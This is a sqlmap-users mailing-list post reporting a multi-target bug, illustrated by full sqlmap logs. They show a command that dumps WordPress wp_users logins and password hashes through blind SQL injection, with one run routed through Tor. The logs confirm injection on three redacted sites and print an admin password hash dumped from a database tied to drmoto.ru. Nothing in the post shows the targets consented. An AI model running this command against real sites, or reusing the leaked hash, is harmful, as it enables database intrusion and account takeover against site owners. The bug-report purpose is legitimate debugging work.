The command line I used was sqlmap.py -m test-urls.txt -Twp_users
-Cid,user_login,user_pass --dump --stop 1 --answer="crack=N" -p id
--technique=B --null-connection --batch > test-urls-output.txt
When processing a list of urls from a file, sqlmap retrieves the
database name from the first url and the uses this database name when
trying to retrieve column names for all other urls.
For example in the attachment test-url-a48948_1.txt the first database
name retrieved was 'a48948_1', sqlmap tried to retrieve columns names
for the database a48948_1 in all following urls and failed.
In the attachment test-urls-drmoto_wp.txt the first database name to be
retrieved was 'drmoto_wp', then sqlmap tried to retrieve columns names
for the database a48948_1 in all following urls.
The file test-urls.txt in these two runs contained the same 3 urls,
just in different order.
sqlmap/1.0-dev-50ac3aa - automatic SQL injection and database takeover tool
http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior
mutual consent is illegal. It is the end user's responsibility to obey all
applicable local, state and federal laws. Developers assume no liability and
are not responsible for any misuse or damage caused by this program
[*] starting at 00:53:07
[00:53:07] [INFO] parsing multiple targets list from 'test-urls.txt'
[00:53:07] [INFO] sqlmap got a total of 3 targets
url 1:
GET
http://************************************************************************
do you want to test this url? [Y/n/q]
> Y
[00:53:07] [INFO] testing url
'*************************************************************'
[00:53:07] [INFO] flushing session file
[00:53:07] [INFO] using 'D:\Soft\sqlmap-dev\output\results-04072013_1253am.csv'
as the CSV results file in multiple targets mode
[00:53:07] [INFO] testing connection to the target url
[00:53:08] [INFO] testing if the url is stable. This can take a couple of
seconds
[00:53:12] [WARNING] reflective value(s) found and filtering out
[00:53:12] [WARNING] heuristic (basic) test shows that GET parameter 'id' might
not be injectable
[00:53:12] [INFO] testing for SQL injection on GET parameter 'id'
[00:53:12] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[00:53:18] [INFO] GET parameter 'id' is 'AND boolean-based blind - WHERE or
HAVING clause' injectable
[00:53:29] [INFO] heuristic (extended) test shows that the back-end DBMS could
be 'MySQL'
do you want to include all tests for 'MySQL' extending provided level (1) and
risk (1)? [Y/n] Y
[00:53:29] [INFO] checking if the injection point on GET parameter 'id' is a
false positive
GET parameter 'id' is vulnerable. Do you want to keep testing the others (if
any)? [y/N] N
sqlmap identified the following injection points with a total of 18 HTTP(s)
requests:
---
Place: GET
Parameter: id
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: *********************************************************8
---
do you want to exploit this SQL injection? [Y/n] Y
[00:53:36] [INFO] testing MySQL
[00:53:37] [INFO] confirming MySQL
[00:53:39] [INFO] the back-end DBMS is MySQL
web application technology: Apache
back-end DBMS: MySQL >= 5.0.0
[00:53:39] [WARNING] missing database parameter. sqlmap is going to use the
current database to enumerate table(s) entries
[00:53:39] [INFO] fetching current database
[00:53:39] [WARNING] running in a single-thread mode. Please consider usage of
option '--threads' for faster data retrieval
[00:53:39] [INFO] retrieved: a48948_1
[00:55:03] [INFO] fetching columns 'id, user_login, user_pass' for table
'wp_users' in database 'a48948_1'
[00:55:03] [INFO] retrieved: 0
[00:55:13] [ERROR] unable to retrieve the number of columns for table
'wp_users' in database 'a48948_1'
[00:55:13] [WARNING] unable to retrieve column names for table 'wp_users' in
database 'a48948_1'
[00:55:13] [INFO] fetching entries of column(s) 'id, user_login, user_pass' for
table 'wp_users' in database 'a48948_1'
[00:55:13] [INFO] fetching number of column(s) 'id, user_login, user_pass'
entries for table 'wp_users' in database 'a48948_1'
[00:55:13] [INFO] retrieved:
[00:55:18] [WARNING] in case of continuous data retrieval problems you are
advised to try a switch '--no-cast' or switch '--hex'
[00:55:18] [WARNING] unable to retrieve the number of column(s) 'id,
user_login, user_pass' entries for table 'wp_users' in database 'a48948_1'
url 2:
GET http://**************************************************
do you want to test this url? [Y/n/q]
> Y
[00:55:38] [INFO] testing url
'http://*************************************************'
[00:55:38] [INFO] testing connection to the target url
[00:55:39] [INFO] testing if the url is stable. This can take a couple of
seconds
[00:55:41] [INFO] url is stable
[00:55:41] [WARNING] reflective value(s) found and filtering out
[00:55:41] [WARNING] heuristic (basic) test shows that GET parameter 'id' might
not be injectable
[00:55:41] [INFO] testing for SQL injection on GET parameter 'id'
[00:55:41] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[00:55:45] [INFO] GET parameter 'id' is 'AND boolean-based blind - WHERE or
HAVING clause' injectable
[00:55:51] [INFO] heuristic (extended) test shows that the back-end DBMS could
be 'MySQL'
do you want to include all tests for 'MySQL' extending provided level (1) and
risk (1)? [Y/n] Y
[00:55:51] [INFO] checking if the injection point on GET parameter 'id' is a
false positive
GET parameter 'id' is vulnerable. Do you want to keep testing the others (if
any)? [y/N] N
sqlmap identified the following injection points with a total of 18 HTTP(s)
requests:
---
Place: GET
Parameter: id
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: *****************************************************************
---
do you want to exploit this SQL injection? [Y/n] Y
[00:55:54] [INFO] testing MySQL
[00:55:55] [INFO] confirming MySQL
[00:55:56] [INFO] the back-end DBMS is MySQL
web application technology: Apache
back-end DBMS: MySQL >= 5.0.0
[00:55:56] [INFO] fetching columns 'id, user_login, user_pass' for table
'wp_users' in database 'a48948_1'
[00:55:56] [WARNING] running in a single-thread mode. Please consider usage of
option '--threads' for faster data retrieval
[00:55:56] [INFO] retrieved: 0
[00:56:01] [ERROR] unable to retrieve the number of columns for table
'wp_users' in database 'a48948_1'
[00:56:01] [WARNING] unable to retrieve column names for table 'wp_users' in
database 'a48948_1'
[00:56:01] [INFO] fetching entries of column(s) 'id, user_login, user_pass' for
table 'wp_users' in database 'a48948_1'
[00:56:01] [INFO] fetching number of column(s) 'id, user_login, user_pass'
entries for table 'wp_users' in database 'a48948_1'
[00:56:01] [INFO] retrieved:
[00:56:03] [WARNING] in case of continuous data retrieval problems you are
advised to try a switch '--no-cast' or switch '--hex'
[00:56:03] [WARNING] unable to retrieve the number of column(s) 'id,
user_login, user_pass' entries for table 'wp_users' in database 'a48948_1'
url 3:
GET http://********************************************************
do you want to test this url? [Y/n/q]
> Y
[00:56:03] [INFO] testing url
'http://**************************************************'
[00:56:03] [INFO] flushing session file
[00:56:03] [INFO] testing connection to the target url
[00:56:03] [INFO] testing if the url is stable. This can take a couple of
seconds
[00:56:05] [INFO] url is stable
[00:56:06] [WARNING] reflective value(s) found and filtering out
[00:56:06] [WARNING] heuristic (basic) test shows that GET parameter 'id' might
not be injectable
[00:56:06] [INFO] testing for SQL injection on GET parameter 'id'
[00:56:07] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[00:56:11] [INFO] GET parameter 'id' is 'AND boolean-based blind - WHERE or
HAVING clause' injectable
[00:56:17] [INFO] heuristic (extended) test shows that the back-end DBMS could
be 'MySQL'
do you want to include all tests for 'MySQL' extending provided level (1) and
risk (1)? [Y/n] Y
[00:56:17] [INFO] checking if the injection point on GET parameter 'id' is a
false positive
GET parameter 'id' is vulnerable. Do you want to keep testing the others (if
any)? [y/N] N
sqlmap identified the following injection points with a total of 18 HTTP(s)
requests:
---
Place: GET
Parameter: id
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: **********************************************************
---
do you want to exploit this SQL injection? [Y/n] Y
[00:56:20] [INFO] testing MySQL
[00:56:21] [INFO] confirming MySQL
[00:56:22] [INFO] the back-end DBMS is MySQL
web application technology: PHP 5.2.10, Nginx
back-end DBMS: MySQL >= 5.0.0
[00:56:22] [INFO] fetching columns 'id, user_login, user_pass' for table
'wp_users' in database 'a48948_1'
[00:56:22] [WARNING] running in a single-thread mode. Please consider usage of
option '--threads' for faster data retrieval
[00:56:22] [INFO] retrieved: 0
[00:56:31] [ERROR] unable to retrieve the number of columns for table
'wp_users' in database 'a48948_1'
[00:56:31] [WARNING] unable to retrieve column names for table 'wp_users' in
database 'a48948_1'
[00:56:31] [INFO] fetching entries of column(s) 'id, user_login, user_pass' for
table 'wp_users' in database 'a48948_1'
[00:56:31] [INFO] fetching number of column(s) 'id, user_login, user_pass'
entries for table 'wp_users' in database 'a48948_1'
[00:56:31] [INFO] retrieved:
[00:56:33] [WARNING] in case of continuous data retrieval problems you are
advised to try a switch '--no-cast' or switch '--hex'
[00:56:33] [WARNING] unable to retrieve the number of column(s) 'id,
user_login, user_pass' entries for table 'wp_users' in database 'a48948_1'
[00:56:33] [INFO] you can find results of scanning in multiple targets mode
inside the CSV file 'D:\Soft\sqlmap-dev\output\results-04072013_1253am.csv'
[*] shutting down at 00:56:33
sqlmap/1.0-dev-50ac3aa - automatic SQL injection and database takeover tool
http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior
mutual consent is illegal. It is the end user's responsibility to obey all
applicable local, state and federal laws. Developers assume no liability and
are not responsible for any misuse or damage caused by this program
[*] starting at 12:35:21
[12:35:21] [WARNING] increasing default value for option '--time-sec' to 10
because switch '--tor' was provided
[12:35:21] [INFO] setting Tor HTTP proxy settings
[12:35:22] [WARNING] use switch '--check-tor' at your own convenience when
accessing Tor anonymizing network because of known issues with default settings
of various 'bundles' (e.g. Vidalia)
[12:35:22] [INFO] parsing multiple targets list from 'test-urls.txt'
[12:35:22] [INFO] sqlmap got a total of 3 targets
url 1:
GET http://**********************************************************
do you want to test this url? [Y/n/q]
> Y
[12:35:22] [INFO] testing url
'http://************************************************'
[12:35:22] [INFO] using 'D:\Soft\sqlmap-dev\output\results-04072013_1235pm.csv'
as the CSV results file in multiple targets mode
[12:35:22] [INFO] testing connection to the target url
[12:35:24] [INFO] testing NULL connection to the target url
[12:35:28] [INFO] testing if the url is stable. This can take a couple of
seconds
[12:35:31] [INFO] url is stable
[12:35:33] [WARNING] reflective value(s) found and filtering out
[12:35:33] [WARNING] heuristic (basic) test shows that GET parameter 'id' might
not be injectable
[12:35:33] [INFO] testing for SQL injection on GET parameter 'id'
[12:35:33] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[12:35:49] [INFO] GET parameter 'id' is 'AND boolean-based blind - WHERE or
HAVING clause' injectable
[12:36:16] [INFO] checking if the injection point on GET parameter 'id' is a
false positive
GET parameter 'id' is vulnerable. Do you want to keep testing the others (if
any)? [y/N] N
sqlmap identified the following injection points with a total of 17 HTTP(s)
requests:
---
Place: GET
Parameter: id
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload:
*********************************************************************
---
do you want to exploit this SQL injection? [Y/n] Y
[12:36:32] [INFO] testing MySQL
[12:36:36] [INFO] confirming MySQL
[12:36:42] [INFO] the back-end DBMS is MySQL
web application technology: Apache
back-end DBMS: MySQL >= 5.0.0
[12:36:42] [WARNING] missing database parameter. sqlmap is going to use the
current database to enumerate table(s) entries
[12:36:42] [INFO] fetching current database
[12:36:42] [WARNING] running in a single-thread mode. Please consider usage of
option '--threads' for faster data retrieval
[12:36:42] [INFO] retrieved: drmoto_wp
[12:41:22] [INFO] fetching columns 'id, user_login, user_pass' for table
'wp_users' in database 'drmoto_wp'
[12:41:22] [INFO] retrieved: 3
[12:41:46] [INFO] retrieved: ID
[12:42:41] [INFO] retrieved: user_login
[12:47:44] [INFO] retrieved: user_pass
[12:52:25] [INFO] fetching entries of column(s) 'ID, user_login, user_pass' for
table 'wp_users' in database 'drmoto_wp'
[12:52:25] [INFO] fetching number of column(s) 'ID, user_login, user_pass'
entries for table 'wp_users' in database 'drmoto_wp'
[12:52:25] [INFO] retrieved: 13
[12:53:19] [INFO] retrieved: 1
[12:54:30] [INFO] retrieved:
[12:55:16] [INFO] heuristics detected web page charset 'ascii'
admin
[12:57:06] [INFO] retrieved: $P$B9UA6Ixzu72k/sWNnw2i8SJSOAxghQ.
[13:08:20] [INFO] analyzing table dump for possible password hashes
[13:08:20] [INFO] recognized possible password hashes in column 'user_pass'
[13:08:20] [INFO] writing hashes to file
'd:\soft\sqlmap-dev\sqlmaphashes-ib3psp.txt' for eventual further processing
with other tools
[13:08:20] [INFO] do you want to crack them via a dictionary-based attack?
[y/N/q] N
Database: drmoto_wp
Table: wp_users
[1 entry]
+----+------------------------------------+------------+
| ID | user_pass | user_login |
+----+------------------------------------+------------+
| 1 | $P$B9UA6Ixzu72k/sWNnw2i8SJSOAxghQ. | admin |
+----+------------------------------------+------------+
[13:08:20] [INFO] table 'drmoto_wp.wp_users' dumped to CSV file
'D:\Soft\sqlmap-dev\output\drmoto.ru\dump\drmoto_wp\wp_users.csv'
[13:08:20] [WARNING] HTTP error codes detected during run:
502 (Bad Gateway) - 1 times
url 2:
GET http://***************************************************************
do you want to test this url? [Y/n/q]
> Y
[13:08:20] [INFO] testing url
'************************************************************'
[13:08:20] [INFO] testing connection to the target url
[13:08:24] [INFO] testing NULL connection to the target url
[13:08:27] [INFO] testing if the url is stable. This can take a couple of
seconds
[13:08:30] [INFO] url is stable
[13:08:34] [WARNING] reflective value(s) found and filtering out
[13:08:34] [WARNING] heuristic (basic) test shows that GET parameter 'id' might
not be injectable
[13:08:34] [INFO] testing for SQL injection on GET parameter 'id'
[13:08:34] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[13:08:49] [INFO] GET parameter 'id' is 'AND boolean-based blind - WHERE or
HAVING clause' injectable
[13:09:06] [INFO] checking if the injection point on GET parameter 'id' is a
false positive
GET parameter 'id' is vulnerable. Do you want to keep testing the others (if
any)? [y/N] N
sqlmap identified the following injection points with a total of 17 HTTP(s)
requests:
---
Place: GET
Parameter: id
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: ******************************************************
---
do you want to exploit this SQL injection? [Y/n] Y
[13:09:15] [INFO] testing MySQL
[13:09:18] [INFO] confirming MySQL
[13:09:21] [INFO] the back-end DBMS is MySQL
web application technology: PHP 5.2.10, Nginx
back-end DBMS: MySQL >= 5.0.0
[13:09:21] [INFO] fetching columns 'id, user_login, user_pass' for table
'wp_users' in database 'drmoto_wp'
[13:09:21] [WARNING] running in a single-thread mode. Please consider usage of
option '--threads' for faster data retrieval
[13:09:21] [INFO] retrieved: 0
[13:09:38] [ERROR] unable to retrieve the number of columns for table
'wp_users' in database 'drmoto_wp'
[13:09:38] [WARNING] unable to retrieve column names for table 'wp_users' in
database 'drmoto_wp'
[13:09:38] [INFO] fetching entries of column(s) 'id, user_login, user_pass' for
table 'wp_users' in database 'drmoto_wp'
[13:09:38] [INFO] fetching number of column(s) 'id, user_login, user_pass'
entries for table 'wp_users' in database 'drmoto_wp'
[13:09:38] [INFO] retrieved:
[13:09:49] [WARNING] in case of continuous data retrieval problems you are
advised to try a switch '--no-cast' or switch '--hex'
[13:09:49] [WARNING] unable to retrieve the number of column(s) 'id,
user_login, user_pass' entries for table 'wp_users' in database 'drmoto_wp'
url 3:
GET
http://*******************************************************************************
do you want to test this url? [Y/n/q]
> Y
[13:09:49] [INFO] testing url
'**********************************************************88'
[13:09:49] [INFO] testing connection to the target url
[13:09:52] [INFO] testing NULL connection to the target url
[13:09:57] [INFO] testing if the url is stable. This can take a couple of
seconds
[13:10:04] [WARNING] reflective value(s) found and filtering out
[13:10:04] [WARNING] heuristic (basic) test shows that GET parameter 'id' might
not be injectable
[13:10:04] [INFO] testing for SQL injection on GET parameter 'id'
[13:10:04] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[13:10:23] [INFO] GET parameter 'id' is 'AND boolean-based blind - WHERE or
HAVING clause' injectable
[13:10:52] [INFO] checking if the injection point on GET parameter 'id' is a
false positive
GET parameter 'id' is vulnerable. Do you want to keep testing the others (if
any)? [y/N] N
sqlmap identified the following injection points with a total of 17 HTTP(s)
requests:
---
Place: GET
Parameter: id
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload:
***********************************************************************
---
do you want to exploit this SQL injection? [Y/n] Y
[13:11:08] [INFO] testing MySQL
[13:11:10] [INFO] confirming MySQL
[13:11:16] [INFO] the back-end DBMS is MySQL
web application technology: Apache
back-end DBMS: MySQL >= 5.0.0
[13:11:16] [INFO] fetching columns 'id, user_login, user_pass' for table
'wp_users' in database 'drmoto_wp'
[13:11:16] [WARNING] running in a single-thread mode. Please consider usage of
option '--threads' for faster data retrieval
[13:11:16] [INFO] retrieved: 0
[13:11:41] [ERROR] unable to retrieve the number of columns for table
'wp_users' in database 'drmoto_wp'
[13:11:41] [WARNING] unable to retrieve column names for table 'wp_users' in
database 'drmoto_wp'
[13:11:41] [INFO] fetching entries of column(s) 'id, user_login, user_pass' for
table 'wp_users' in database 'drmoto_wp'
[13:11:41] [INFO] fetching number of column(s) 'id, user_login, user_pass'
entries for table 'wp_users' in database 'drmoto_wp'
[13:11:41] [INFO] retrieved:
[13:11:56] [WARNING] in case of continuous data retrieval problems you are
advised to try a switch '--no-cast' or switch '--hex'
[13:11:56] [WARNING] unable to retrieve the number of column(s) 'id,
user_login, user_pass' entries for table 'wp_users' in database 'drmoto_wp'
[13:11:56] [INFO] you can find results of scanning in multiple targets mode
inside the CSV file 'D:\Soft\sqlmap-dev\output\results-04072013_1235pm.csv'
[*] shutting down at 13:11:56
------------------------------------------------------------------------------
Minimize network downtime and maximize team effectiveness.
Reduce network management and security costs.Learn how to hire
the most talented Cisco Certified professionals. Visit the
Employer Resources Portal
http://www.cisco.com/web/learning/employer_resources/index.html
_______________________________________________
sqlmap-users mailing list
sqlmap-users@lists.sourceforge.net
https://lists.sourceforge.net/lists/listinfo/sqlmap-users
